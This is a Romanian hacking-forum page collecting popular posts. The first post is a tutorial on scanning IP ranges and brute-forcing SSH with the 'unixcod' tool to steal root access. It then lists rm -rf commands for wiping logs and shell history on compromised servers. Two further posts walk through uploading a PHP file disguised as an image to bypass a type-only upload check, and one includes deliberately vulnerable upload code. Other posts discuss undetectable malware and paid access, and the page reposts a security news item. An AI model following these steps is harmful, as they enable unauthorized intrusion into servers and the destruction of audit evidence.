Jump to content

Leaderboard

Popular Content

Showing content with the highest reputation on 07/27/12 in all areas

  1. Toti cauta sa sparga rooturi sau alte servici de care pot profita in mediul online..Un exemplu de "munca" ar fi: De ce avem nevoie: -1- bucata scanner ssh -2- bucata brute force ssh -3- 2 in 1 .... Avem nevoie de scannerul: unixcod Descarcam scannerul:2shared - download unixcod.tar.gz PS : tool-ul folosit este unul destul de comod care se descurca destul de bine , dar totusi , daca vrei sa furi ceva bun ai nevoie de ceva pe masura. Deschidem consola.. Folosim comanda de extragere: sudo tar -zxvf <sursa fisier> Fisierul este extras..acum frumos selectam din consola calea catre folder: cd <sursa fisier> Acum ca sa pornim scannerul , in folderul sursa , dam comanda: ./unix ip.ip Unde ip sunt primele 2 rangeuri dintr-un ip , de exemplu din ip-ul 100.111.122.133 luam doar 100.111. EXEMPLU: Start scan: user@user-desktop:~/unixcod$ ./unix 70.70 [+][+][+][+][+] UnixCoD Atack Scanner [+][+][+][+][+] [+] SSH Brute force scanner : user & password [+] [+] Undernet Channel : #UnixCoD [+] [+][+][+][+][+][+][+] ver 0x10 [+][+][+][+][+][+][+] [+] Scanam: 70.70.4.* (total: 2) (1.6% done) Scan finish: [+] Find ip a terminat in 530 de secunde. [Am gasit 66 ip`uri] [+] Incepe partea cea mai misto [+] Doar 66 de servere. Exista un inceput pt. toate ! [=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=] [+] Incepem sa vedem cate server putem sparge [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Scanner a terminat de scanat ! Cand acceseri un root/server web e bine sa iti stergi logurile , in masura permisiunilor furate: Avem comenzile urmatoare ______________________________________________ | | +LOG REMOVE SHELL COMAND+ | | |___|____________________________________|___| | + | rm -rf unixcod | + | | + | rm -rf /tmp/logs | + | | + | rm -rf $HISTFILE | + | | + | rm -rf /root/.ksh_history | + | | + | rm -rf /root/.bash_history | + | | + | rm -rf /root/.ksh_history | + | | + | rm -rf /root/.bash_logout | + | | + | rm -rf /usr/local/apache/logs | + | | + | rm -rf /usr/local/apache/log | + | | + | rm -rf /var/apache/logs | + | | + | rm -rf /var/apache/log | + | | + | rm -rf /var/run/utmp | + | | + | rm -rf /var/logs | + | | + | rm -rf /var/log | + | | + | rm -rf /var/adm | + | | + | rm -rf /etc/wtmp | + | | + | rm -rf /etc/utmp | + | | + | | + | | + |~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~| + | | + | | + | |_+_|____________________________________|_+_| Alte completari o sa aduc in masura intrebarilor postate.
    1 point
  2. In urma cererii unui utilizator in acest subiect am sa fac tutorialul promis.Pentru inceput avem nevoie de Mozilla Firefox . Dupa ce l-ati instalat, instalati plugin-ul Tamper Data . Nu am sa va explic cum sa instalati Firefox sau acel plugin pentru ca este extrem de simplu. Acum ca aveti uneltele necesare, putem incepe. Deschideti Firefox, el va arata la inceput asa: Si pentru ca mie nu-mi place asa si nu mi-se pare usor de folosit meniul acela smecheresc al lor am facut urmatoarele pentru a avea acces mai rapid la tot ce ma intereseaza, si am procedat asa: Apasati pe butonul acela portocaliu pe care scrie Firefox -> "Optiuni" -> Apasati pe "Bara meniului" Dupa ce ati apasat, butonul portocaliu cu Firefox va disparea si va aparea meniul clasic. Iar plugin-ul Tamper Data il veti gasi la Unelte, la mine este ultimul din meniul ce apare, pentru ca nu folosesc Firefox si nu am alte plugin-uri instalate. Asa, acum sa trecem la partea PHP si ce, si cum. Pentru a testa metoda voi face un script rapid, care verifica DOAR tipul fisierului, nu si extensia, aceasta metoda functionand doar pe site-urile ce verifica DOAR tipul fisierului primit in header de la client. Voi face un singur fisier care va contine si formularul de urcare al fisierului, cat si partea PHP. Fisierul "upload.php" : <?php $tipuri_valide = array("image/png","image/gif","image/jpeg"); if(isset($_FILES['fisier'])) { if(in_array($_FILES['fisier']['type'], $tipuri_valide)) { if(move_uploaded_file($_FILES['fisier']['tmp_name'],"./{$_FILES['fisier']['name']}")) echo "Fisierul a fost urcat cu succes! <br/><br/>"; } else echo "Ai voie doar imagini (jpg, png, gif)<br/><br/>"; } ?> <form method = "post" enctype = "multipart/form-data"> <input type = "file" name = "fisier" /> <input type = "submit" value = "Urca!" /> </form> Asa, acum ca avem si unde testa tehnica putem continua. Incepem prin a intra pe site-ul pe care vrem sa urcam fisierul nostru, fie el php, swf, html, sau ce alt fisier vrem. Odata intrati pe site incercam sa-l urcam simplu, cum ati face cu orice alt fisier, eu voi urca un fisier PHP denumit fisier_malitios.php Continutul fisierului fisier_malitios.php : [SIZE=3]<?php[/SIZE] [SIZE=3] phpinfo();[/SIZE] [SIZE=3]?>[/SIZE] Iar dupa ce l-am urcat vom primi un mesaj cum ca ori tipul fisierului nu este acceptat, ori o lista cu tipul de fisiere acceptate. Acum ca stim ca putem urca doar imagini, jpg,png sau gif, vom redenumi fisierul "fisier_malitios.php" in "fisier_malitios.PNG" sau "fisier_malitios.JPG" sau "fisier_malitios.GIF", sau orice alta extensie a tipurilor de fisiere valabile, eu am sa redenumesc in "fisier_malitios.jpg" Acum ca avem fisierul nostru malitios cu extensia unui tip de fisier valabil, vom trece si in Tamper Data. Deci, ne reintoarcem in Firefox, pe acelasi site, dar acum vom da sa urcam fisierul nostru redenumit, in cazul meu "fisier_malitios.jpg", DAR NU APASATI PE BUTONUL "Urca!" INCA, DOAR SELECTATI FISIERUL PENTRU A FI URCAT! Dupa ce l-ati selectat pentru a fi urcat mergeti in meniul "Unelte" -> "Tamper Data" Dupa ce ati apasat pe "Tamper Data", o fereastra ca aceasta va va aparea: In fereastra nou aparuta apasati pe butonul "Start Tamper" Dupa ce ati apasat pe butonul "Start Tamper" el se va dezactiva, iar butonul de langa el "Stop Tamper" va deveni activ. Acum este timpul sa lasam aceasta fereastra deoparte, deschisa si sa ne intoarcem inapoi in Firefox, unde vom apasa pe butonul "Urca!", tineti minte, lasati fereastra cu "Tamper Data" deschisa si Tamper-ul pornit. Odata apasat butonul "Urca!", actiunea de trimitere a datelor catre site va fi oprita si vom fi intampinati cu urmatorul mesaj: Si cum ne este si sugerat, vom apasa pe butonul "Tamper", cel incercuit cu albastru in imaginea de mai sus. Dupa ce ati apasat pe butonul "Tamper", o alta fereastra se va deschide In fereastra incercuita cu rosu din imaginea de mai sus (^) ne vom concentra asupra sectiunii marcate cu prin chenarul albastru. In acea casuta vom cauta urmatorul lucru ' filename="fisier_malitios.jpg" ' Dupa ce l-am gasit, vom modifica ' filename="fisier_malitios.jpg" ' in ' filename="fisier_malitios.php" ', deci vom modifica extensia fisierului din cea valida in cea initiala, in cazul meu ea fiind ".php" Dupa ce am terminat de modificat, apasam pe butonul "Ok" Dupa ce ati apasat pe butonul "Ok", trimiterea datelor va continua, iar daca totul a decurs cum trebuie, vom primi mesajul "Fisierul a fost urcat cu succes!", iar fereastra "Tamper Data" o puteti inchide. DACA DUPA CE ATI MODIFICAT EXTENSIA SI ATI APASAT PE BUTONUL OK SI INCA MAI PRIMITI FEREASTRA ACEEA CE AM PRIMIT-O DUPA CE AM APASAT PE BUTONUL "Urca!", ACEA FEREASTRA CU BUTOANELE "Tamper", "Submit", "Abort Request", APASATI PE SUBMIT LA TOATE PANA NU MAI APAR. Iar acum putem vedea daca chiar am pacalit sistemul si am urcat un fisier care in mod normal nu aveam voie sa-l urcam, asa ca vom intra pe site, unde sunt urcate fisierele si vom cauta fisierul nostru. Iar dupa cum putem vedea, fisierul nostru "fisier_malitios.php" a fost urcat cu succes, si acum il putem testa. Si dupa cum se vede in imaginea anterioara "fisier_malitios.php" functioneaza cum perfect. Sper sa va fie de ajutor acest tutorial in a va invata sa va protejati site-urile impotriva urcarii de fisiere malitioase. Daca ati gasiti greseli de scriere/exprimare, va rog sa-mi atrageti atentia. Si daca vreti sa adaugati ceva acestui tutorial, simtiti-va liberi sa o faceti.
    1 point
  3. Ma! Ori zici FUD, ori zici 100% UD care defapt e tot FUD. FUD = fully undetectable Folositi cuvinte care nu stiti ce inseamna. Si cine crezi ca il downloadeaza daca ai 1 post?
    1 point
  4. Cei cu peste 600 posturi primesc gratuit 300-600 : 3 euro pe luna 0 - 299 : 5 euro pe luna limita: 250 de oameni ( fiecare o sa intre cu ip-ul ) banii pe paypal/lr, contul vi-l trimit prin pm ( daca dati cb pe paypal va inchid acces-ul... daca dati dupa 30 de zile... o sa castig aproape 100% case-ul cu paypal )
    1 point
  5. In ziua de astazi se verifica si extensia fisierului, nu doar tipul trimis de utilizator, cel putin asa este cel mai bine. Si metoda asta este de cand lumea, si se poate si mai simplu face asa ceva, cu Mozilla Firefox si pluginul Tamper Data si cu un script php redenumit in script.jpg, script.gif, script.orice. Procedura: Intri cu Firefox pe site-ul dorit, dai Cotrobaie, alegi fisierul script.gif, si inainte sa dai pe butonul ce trimite formularul te duci la Tools -> Tamer Data, apesi pe Start Tamper sus in dreapta, te muti inapoi in fereastra de Firefox, apesi pe butonul ce trimite formularul, Firefox va fi oprit iar tu vei fi intrebat daca datele trimise sa treaca prin plugin, sau sa continue, fereastra care te va intreba va avea parca 3 butoane si un checkbox, lasi electat checkbox-ul acela cu Continue Tampering, si apesi Stamper, se va deschide o alta fereastra unde vei avea header-ul si datele trimise, te uiti pe acolo, cauti script.gif si cand gasesti inlocuiesti din .gif in .php, dai OK, dai Submit la celelalte intrebari daca sa treaca prin plugin datele sau nu, si pagina se va incarca, iar fisierul va fi urcat cu extensia .php, Daca nu ati inteles cereti si am sa va fac un tutorial cu poze :3
    -1 points
  6. Malware attack targets German internet users | Naked Security by Graham Cluley on July 26, 2012 Do you remember the spammed-out malware attack which appeared to be targeting French speakers last week with its offer of très sexy photos from a Gallic admirer? Well, now it seems that German internet users are in the targets of cybercriminals. A malware campaign has been sent out, seemingly just to email addresses ending in ".de", claiming that photos of the recipient can be found in the attached file. Those with a curious disposition might find it hard to resist clicking on the attachment to find out more. Here are just a small selection of the examples we have intercepted in our spam traps: You'll notice that the emails have forged "from:" addresses. Presumably the masterminds of the malware campaign are hoping that some users might be more likely to open emails that pretend to come from LinkedIn.. .. or Habbo Hotel. Attached to each of the emails is a file, called DCIM.htm, which is detected by Sophos products as Troj/Redir-P. The file (which users are encouraged by the email to open using Internet Explorer) attempts to contact a Russian website known to contain malware. Remember to always be suspicious of unsolicited messages, even if they arrive in your native language. Sursa: Malware attack targets German internet users | Naked Security
    -1 points
×
×
  • Create New...